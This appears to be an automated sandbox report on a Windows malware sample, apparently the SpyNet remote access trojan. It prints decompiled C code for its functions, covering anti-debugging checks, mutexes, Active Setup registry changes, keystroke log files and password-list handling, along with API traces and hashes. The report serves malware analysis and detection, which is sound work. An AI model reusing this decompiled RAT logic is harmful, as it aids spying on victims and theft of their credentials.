                                    • Instruction Fuzzy Hash: 70E086723006143B9710EEDB9C41C9BBBACDEC9B64310C53BB508972519475AD0186F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040562C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E0040562C() {
				void* _t5;
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;

				_t5 = 0;
				_t6 = LoadLibraryA("kernel32.dll");
				if(_t6 != 0) {
					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
					_t7 = _t8;
					if(_t8 != 0) {
						_t5 =  *_t7();
					}
				}
				return _t5;
			}







                                    0x00405630
                                    0x0040563c
                                    0x00405640
                                    0x0040564d
                                    0x0040564f
                                    0x00405653
                                    0x00405657
                                    0x00405657
                                    0x00405653
                                    0x0040565f

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8,00000000,0040B22C,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405637
                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: IsDebuggerPresent$kernel32.dll
                                    • API String ID: 2574300362-2078679533
                                    • Opcode ID: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction ID: 709391d187db73d1dcda7b1af944ced4f983b45a8e89d04e37376b255e5d8423
                                    • Opcode Fuzzy Hash: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction Fuzzy Hash: 4AD0121634561C2982313CE91C85F275A4CC5C5665799093BB508A2381DDAB4C0559A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004069E4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004069E4(void* __ecx, char* __edx) {
				void* _v8;
				char* _t7;
				void** _t11;

				_t7 = __edx;
				RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t11);
				RegDeleteKeyA(_v8, _t7);
				return RegCloseKey(_v8);
			}






                                    0x004069e6
                                    0x004069fa
                                    0x00406a05
                                    0x00406a15

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
                                    • RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
                                    • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 00406A0E
                                    Strings
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004069F0
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteOpen
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\
                                    • API String ID: 3399588633-1337323248
                                    • Opcode ID: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction ID: e40fb9d213039d93dcec3c1e8996a1bef626a17aa7b52359fc93130613ad7c1e
                                    • Opcode Fuzzy Hash: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction Fuzzy Hash: FBD0A7B07443003AE110BAD65C83F1B268CC7C8745F10442A7104BB0C2C4789D000579
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405E60, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405E60(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405e62
                                    0x00405e64
                                    0x00405e76
                                    0x00405e81

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,00405FAE,00000000,00405FEF), ref: 00405E70
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction ID: 4b7778617931093bb27523e6f2e67fe50c24fa97b8e3c3713106166120904923
                                    • Opcode Fuzzy Hash: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction Fuzzy Hash: F7C08CB120162039D9203AF60C82EAB094CCC8426A32008337408F22C284BE0E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405E18, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405E18(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405e1a
                                    0x00405e1c
                                    0x00405e2e
                                    0x00405e39

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,00405F22,00000000,00405F63), ref: 00405E28
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction ID: c580b32cc06898864e96a6d997c1f25460584718cb9bf05ade4b506b0c3faeb4
                                    • Opcode Fuzzy Hash: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction Fuzzy Hash: 0AC08CB120162035EA203AF60C8AE9B094CCC8466632008337018F22C384BE4E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24070950, Relevance: 6.2, APIs: 4, Instructions: 205librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 24070A9A
                                    • GetProcAddress.KERNEL32(?,2406BFF9), ref: 24070AAF
                                    • VirtualProtect.KERNEL32(24010000,00001000,00000004,?,00000000), ref: 24070B0E
                                    • VirtualProtect.KERNEL32(24010000,00001000), ref: 24070B23
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.557923102.0000000024054000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000009.00000002.557888717.0000000024010000.00000002.00000001.sdmp Download File
                                    • Associated: 00000009.00000002.558206540.0000000024071000.00000004.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 3300690313-0
                                    • Opcode ID: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction ID: fea73935ac89edb1ecb1ad068de3a124fb3e9058189b3824ae919782244a9029
                                    • Opcode Fuzzy Hash: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction Fuzzy Hash: AB512972A553525AE3118A78CCC0E95BBF0EB42234F180778C6E5C73C7E7A459858B6B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004058E0, Relevance: 6.0, APIs: 4, Instructions: 25windowsleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004058E0(struct tagMSG* __eax) {
				long _t7;
				MSG* _t8;

				_t8 = __eax;
				_t7 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t7 = 1;
					if(_t8->message != 0x12) {
						TranslateMessage(_t8);
						DispatchMessageA(_t8);
					}
				}
				Sleep(1);
				return _t7;
			}





                                    0x004058e2
                                    0x004058e4
                                    0x004058f6
                                    0x004058f8
                                    0x004058fe
                                    0x00405901
                                    0x00405907
                                    0x00405907
                                    0x004058fe
                                    0x0040590e
                                    0x00405917

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004058EF
                                    • TranslateMessage.USER32 ref: 00405901
                                    • DispatchMessageA.USER32 ref: 00405907
                                    • Sleep.KERNEL32(00000001,?,00000000,00405922), ref: 0040590E
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction ID: 6e183c8d27a73f5ab686f93293f9443bc1ab9610ab5d407b35826ec629df393a
                                    • Opcode Fuzzy Hash: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction Fuzzy Hash: B9E012B13836147DF63079650C83F9F594C8F02B9AF54453BF201BB2C2C5AA5E0041AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BA84, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040BA84(void* __eflags) {
				void* _t7;

				_t7 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_");
				if(GetLastError() != 0xb7) {
					CloseHandle(_t7);
					return 1;
				} else {
					CloseHandle(_t7);
					return 0;
				}
			}




                                    0x0040ba93
                                    0x0040ba9f
                                    0x0040baac
                                    0x0040bab4
                                    0x0040baa1
                                    0x0040baa2
                                    0x0040baaa
                                    0x0040baaa

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastMutex
                                    • String ID: _x_X_BLOCKMOUSE_X_x_
                                    • API String ID: 2372642624-2341447584
                                    • Opcode ID: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction ID: d02ee9e762f20a6f0fe939e11bc02ca9e1bd7b756de2d39ced16b1d78259e861
                                    • Opcode Fuzzy Hash: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction Fuzzy Hash: 97D0C9A174534035E910B9B51CC3B0E050C875071BFA01837B104BA1D3D67D8601262D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: explorer.exe PID: 2200 Parent PID: 6984 explorer.exeCOMMON

                                    Executed Functions

                                    Function 24056188, Relevance: 56.4, APIs: 19, Strings: 13, Instructions: 394registrysleepthreadCOMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E24056188(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _t43;
				intOrPtr* _t63;
				char* _t64;
				intOrPtr* _t68;
				void* _t71;
				char* _t75;
				char* _t76;
				char* _t83;
				intOrPtr* _t84;
				intOrPtr _t87;
				char* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t96;
				void* _t101;
				void* _t103;
				char* _t104;
				void** _t106;
				void** _t109;
				void* _t118;
				void* _t127;
				intOrPtr* _t140;
				void* _t142;
				intOrPtr* _t143;
				intOrPtr _t155;
				intOrPtr* _t164;
				intOrPtr* _t168;
				intOrPtr* _t171;
				intOrPtr _t176;
				void* _t178;
				intOrPtr* _t179;
				void* _t206;
				void** _t209;
				intOrPtr* _t213;
				void* _t221;
				void* _t222;
				void** _t259;
				intOrPtr _t268;
				void** _t273;
				intOrPtr* _t290;
				intOrPtr* _t298;
				void** _t300;
				intOrPtr* _t303;
				intOrPtr _t305;
				intOrPtr _t306;

				_t301 = __edi;
				_t220 = __ebx;
				_t305 = _t306;
				_t222 = 0xf;
				goto L1;
				L4:
				_t64 =  *0x2405ac50; // 0x2405b948
				if( *_t64 != 1) {
					L8:
					DeleteFileA(E24013534( *0x240637ac));
					_t68 =  *0x2405ac14; // 0x2405b94c
					_t71 = E24014F18(0, 0, E24013534( *_t68));
					_t259 =  *0x2405ab38; // 0x2405b990
					 *_t259 = _t71;
					if(GetLastError() == 0xb7) {
						ExitProcess(0);
					}
					CreateThread(0, 0, E24054C04, 0, 0, 0x240637b8); // executed
					CreateThread(0, 0, E240551BC, 0, 0, 0x240637b8);
					_t75 =  *0x2405ac5c; // 0x2405b94a
					if( *_t75 == 1) {
						E240115E0(0,  &_v80);
						E24013480( *_t303, _v80);
						if(0 != 0) {
							E2401757C( *_t303, _t220, _t303, 0);
							E24016588( *_t303, _t220,  &_v84, _t301, _t303, 0);
							E24017668(_v84, _t220, 0);
						}
					}
					_t76 =  *0x2405ab74; // 0x2405b949
					if( *_t76 == 1) {
						E240115E0(0,  &_v88);
						E24013480( *_t303, _v88);
						if(0 != 0) {
							E24017728( *_t303, _t220, _t303, 0);
							E24016588( *_t303, _t220,  &_v92, _t301, _t303, 0);
							E24017728(_v92, _t220, _t303, 0);
						}
					}
					E24015C1C(GetCurrentProcessId(), _t230); // executed
					E24015B30(); // executed
					E240167F8( &_v96, _t220, _t303, 0); // executed
					_push(_v96);
					_push(0x240567cc);
					_push("logs.dat");
					E240133FC();
					_t83 =  *0x2405abac; // 0x2405b918
					_t316 =  *_t83 - 1;
					if( *_t83 != 1) {
						L23:
						_t84 =  *0x2405ac44; // 0x240572fc
						 *_t84 = 0;
						E24044448(0, _t220,  &_v116, _t303); // executed
						_t87 =  *0x2405ac60; // 0x2405b988
						E240130DC(_t87, _v116);
						_t89 =  *0x2405abe8; // 0x2405b964
						if( *_t89 == 1) {
							_t230 = 0;
							E240178C8(0x24055c64, 0, 0);
						}
						_t90 =  *0x2405ab1c; // 0x2405b960
						if( *_t90 != 0) {
							_t230 = 0;
							E240178C8(E240533BC, 0, 0);
						}
						_t91 =  *0x2405ac08; // 0x2405ca58
						 *_t91 = 0;
						_t92 =  *0x2405ab70; // 0x2405ca54
						 *_t92 = 0x13;
						E240167F8( &_v120, _t220, _t303, 0); // executed
						_push(_v120);
						_push(0x240567cc);
						_push("SQLite3.dll");
						E240133FC();
						_t96 =  *0x2405ab6c; // 0x2405b968
						_t324 =  *_t96;
						if( *_t96 != 0) {
							E24053A04();
							E240158BC( &_v124, _t230, 0, GetCurrentProcessId(), 0);
							E24016858(0x80000001, _t220, "PIDprocess", "SOFTWARE\\Microsoft\\", _t303, _t324, _v124);
							_t127 = E24014F18(0, 0, "SPY_NET_RATMUTEX");
							_t273 =  *0x2405ac38; // 0x2405b994
							 *_t273 = _t127;
							E240178C8(E24055DD4, 0, 0);
						}
						E240178C8(E240500AC, 0, 0);
						E240178C8(E240382AC, 0, 0);
						_t101 = E24014F18(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
						_t221 = _t101;
						_t103 = E24016C78( *_t303, _t221, 0); // executed
						if(_t103 == 1) {
							_t118 = E240166E4(0, E24013534( *_t303), "open", 1, 0, 0); // executed
							if(_t118 > 0x20) {
								Sleep(0x3e8); // executed
								CloseHandle(_t221);
							}
						}
						while(1) {
							_t104 =  *0x2405ab14; // 0x2405aa50
							if( *_t104 != 0) {
								break;
							}
							E24038298();
						}
						_t106 =  *0x2405ab38; // 0x2405b990
						CloseHandle( *_t106);
						_t109 =  *0x2405ac38; // 0x2405b994
						CloseHandle( *_t109);
						Sleep(0x2ee0);
						L35:
						_pop(_t268);
						 *[fs:eax] = _t268;
						_push(0x2405674d);
						return E240130AC( &_v124, 0xf);
					} else {
						E2402444C("[LogFile]\r\n", _t220,  &_v100, "njkvenknvjebcddlaknvfdvjkfdskv", _t301, _t303);
						E240130DC(0x240637b0, _v100);
						E24013344(0x240637b0, 0x24056828);
						_t140 =  *0x2405ab24; // 0x240632f0
						_t142 = E24016C78( *_t140, _t220, _t316); // executed
						_t317 = _t142;
						if(_t142 == 0) {
							_t178 = E2401333C( *0x240637b0);
							_t179 =  *0x2405ab24; // 0x240632f0
							E24016DA0( *_t179, _t220, _t178,  *0x240637b0, _t303, _t317); // executed
						}
						_t143 =  *0x2405ab24; // 0x240632f0
						E24016CE4( *_t143, _t220,  &_v104, 0x240637b8, _t301, _t303, _t317); // executed
						E240130DC(0x240637b4, _v104);
						while(1) {
							_t318 =  *0x240637b4;
							if( *0x240637b4 == 0) {
								break;
							}
							E24013590( *0x240637b4, E24013674(0x24056828,  *0x240637b4) - 1, 1,  &_v112);
							E2402444C(_v112, _t220,  &_v108, "njkvenknvjebcddlaknvfdvjkfdskv", _t301, _t303);
							_t155 =  *0x2405ac00; // 0x240632f4
							E24013344(_t155, _v108);
							__eflags = E24013674(0x24056828,  *0x240637b4) - 1;
							E240135D0(0x240637b4, E24013674(0x24056828,  *0x240637b4) - 1, 1);
							E240135D0(0x240637b4, 4, 1);
						}
						_t164 =  *0x2405ab24; // 0x240632f0
						SetFileAttributesA(E24013534( *_t164), 0x80);
						_t168 =  *0x2405ab24; // 0x240632f0
						E24017668( *_t168, _t220, _t318); // executed
						_t171 =  *0x2405ab24; // 0x240632f0
						SetFileAttributesA(E24013534( *_t171), 2); // executed
						_t230 = 0;
						_t176 = E240178C8(E2405251C, 0, 0);
						_t290 =  *0x2405ac18; // 0x240570d8
						 *_t290 = _t176;
						goto L23;
					}
				}
				_t298 =  *0x2405ac14; // 0x2405b94c
				_t230 = "_PERSIST";
				E24013388( &_v76, "_PERSIST",  *_t298);
				_t206 = E24014F18(0, 0, E24013534(_v76));
				_t300 =  *0x2405ac4c; // 0x2405b9a0
				 *_t300 = _t206;
				if(GetLastError() != 0xb7) {
					E24055240(_t220, _t301, _t303);
					goto L35;
				} else {
					_t209 =  *0x2405ac4c; // 0x2405b9a0
					CloseHandle( *_t209);
					goto L8;
				}
				L1:
				_push(0);
				_push(0);
				_t222 = _t222 - 1;
				_t307 = _t222;
				if(_t222 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					E24014DBC(0x24055ef0);
					_t303 =  *0x2405ac24; // 0x2405b980
					_push(_t305);
					_push(0x24056746);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					E24017038( &_v68);
					E24013388(0x240637ac, "XX--XX--XX.txt", _v68);
					E24016CE4( *0x240637ac, __ebx,  &_v72, 0x240637b8, __edi, _t303, _t307); // executed
					E240130DC(0x240637b0, _v72);
					_t43 =  *0x2405ab18; // 0x2405b97c
					E24013590( *0x240637b0, E24013674(0x24056774,  *0x240637b0) - 1, 1, _t43);
					E240135D0(0x240637b0, E24013674(0x24056774,  *0x240637b0), 1);
					E24013590( *0x240637b0, E24013674(0x24056774,  *0x240637b0) - 1, 1, _t303);
					_t230 = E24013674(0x24056774,  *0x240637b0);
					E240135D0(0x240637b0, _t57, 1);
					E24017BE0( *0x240637b0, __ebx, __edi, _t303, _t307); // executed
					E24017DA8();
					_t63 =  *0x2405ab8c; // 0x2405b8f4
					if( *_t63 != 0) {
						RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, 0x240637bc);
						_t213 =  *0x2405ab8c; // 0x2405b8f4
						RegDeleteKeyA( *0x240637bc, E24013534( *_t213)); // executed
						RegCloseKey( *0x240637bc);
					}
					goto L4;
				}
			}
































































                                    0x24056188
                                    0x24056188
                                    0x24056189
                                    0x2405618b
                                    0x2405618b
                                    0x240562d4
                                    0x240562d4
                                    0x240562dc
                                    0x24056332
                                    0x2405633d
                                    0x24056342
                                    0x24056353
                                    0x24056358
                                    0x2405635e
                                    0x2405636a
                                    0x2405636e
                                    0x2405636e
                                    0x24056385
                                    0x2405639c
                                    0x240563a1
                                    0x240563a9
                                    0x240563b0
                                    0x240563ba
                                    0x240563bf
                                    0x240563c3
                                    0x240563cd
                                    0x240563d5
                                    0x240563d5
                                    0x240563bf
                                    0x240563da
                                    0x240563e2
                                    0x240563e9
                                    0x240563f3
                                    0x240563f8
                                    0x240563fc
                                    0x24056406
                                    0x2405640e
                                    0x2405640e
                                    0x240563f8
                                    0x24056418
                                    0x2405641d
                                    0x24056425
                                    0x2405642a
                                    0x2405642d
                                    0x24056432
                                    0x24056441
                                    0x24056446
                                    0x2405644b
                                    0x2405644e
                                    0x240565ab
                                    0x240565ab
                                    0x240565b2
                                    0x240565b9
                                    0x240565c1
                                    0x240565c6
                                    0x240565cb
                                    0x240565d3
                                    0x240565da
                                    0x240565de
                                    0x240565de
                                    0x240565e3
                                    0x240565eb
                                    0x240565f2
                                    0x240565f6
                                    0x240565f6
                                    0x240565fb
                                    0x24056602
                                    0x24056604
                                    0x24056609
                                    0x24056612
                                    0x24056617
                                    0x2405661a
                                    0x2405661f
                                    0x2405662e
                                    0x24056633
                                    0x24056638
                                    0x2405663b
                                    0x2405663d
                                    0x2405664e
                                    0x24056666
                                    0x24056674
                                    0x24056679
                                    0x2405667f
                                    0x2405668a
                                    0x2405668a
                                    0x24056698
                                    0x240566a6
                                    0x240566b4
                                    0x240566b9
                                    0x240566bd
                                    0x240566c4
                                    0x240566dc
                                    0x240566e4
                                    0x240566eb
                                    0x240566f1
                                    0x240566f1
                                    0x240566e4
                                    0x240566fd
                                    0x240566fd
                                    0x24056705
                                    0x00000000
                                    0x00000000
                                    0x240566f8
                                    0x240566f8
                                    0x24056707
                                    0x2405670f
                                    0x24056714
                                    0x2405671c
                                    0x24056726
                                    0x2405672b
                                    0x2405672d
                                    0x24056730
                                    0x24056733
                                    0x24056745
                                    0x24056454
                                    0x24056461
                                    0x2405646e
                                    0x2405647d
                                    0x24056482
                                    0x24056489
                                    0x2405648e
                                    0x24056490
                                    0x24056497
                                    0x2405649e
                                    0x240564ab
                                    0x240564ab
                                    0x240564b8
                                    0x240564bf
                                    0x240564cc
                                    0x24056551
                                    0x24056551
                                    0x24056558
                                    0x00000000
                                    0x00000000
                                    0x240564f4
                                    0x24056504
                                    0x2405650c
                                    0x24056511
                                    0x2405652d
                                    0x24056538
                                    0x2405654c
                                    0x2405654c
                                    0x24056563
                                    0x24056570
                                    0x24056575
                                    0x2405657c
                                    0x24056583
                                    0x24056590
                                    0x2405659a
                                    0x2405659e
                                    0x240565a3
                                    0x240565a9
                                    0x00000000
                                    0x240565a9
                                    0x2405644e
                                    0x240562de
                                    0x240562e9
                                    0x240562ee
                                    0x24056300
                                    0x24056305
                                    0x2405630b
                                    0x24056317
                                    0x24056328
                                    0x00000000
                                    0x24056319
                                    0x24056319
                                    0x24056321
                                    0x00000000
                                    0x24056321
                                    0x24056190
                                    0x24056190
                                    0x24056192
                                    0x24056194
                                    0x24056194
                                    0x24056195
                                    0x00000000
                                    0x24056197
                                    0x24056197
                                    0x2405619e
                                    0x240561a3
                                    0x240561ab
                                    0x240561ac
                                    0x240561b1
                                    0x240561b4
                                    0x240561ba
                                    0x240561cc
                                    0x240561de
                                    0x240561eb
                                    0x240561f0
                                    0x24056213
                                    0x24056234
                                    0x24056257
                                    0x2405626c
                                    0x24056278
                                    0x24056282
                                    0x24056287
                                    0x2405628c
                                    0x24056294
                                    0x240562ac
                                    0x240562b1
                                    0x240562c4
                                    0x240562cf
                                    0x240562cf
                                    0x00000000
                                    0x24056294

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,240637BC,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 240562AC
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 240562C4
                                    • RegCloseKey.ADVAPI32(?,?,00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,240637BC,2405B980,2405B97C,00000000,24056746,?,?,?,00000000), ref: 240562CF
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 2405630D
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 24056321
                                    • DeleteFileA.KERNEL32(00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 2405633D
                                      • Part of subcall function 24014F18: CreateMutexA.KERNEL32(?,?,?,?,24038D32,00000000,00000000,00000000,00000000,?,00001388,?,24038DFC,?,24038DFC,?), ref: 24014F2E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 24056360
                                    • ExitProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 2405636E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00044C04,00000000,00000000,240637B8), ref: 24056385
                                    • CreateThread.KERNEL32(00000000,00000000,Function_000451BC,00000000,00000000,240637B8), ref: 2405639C
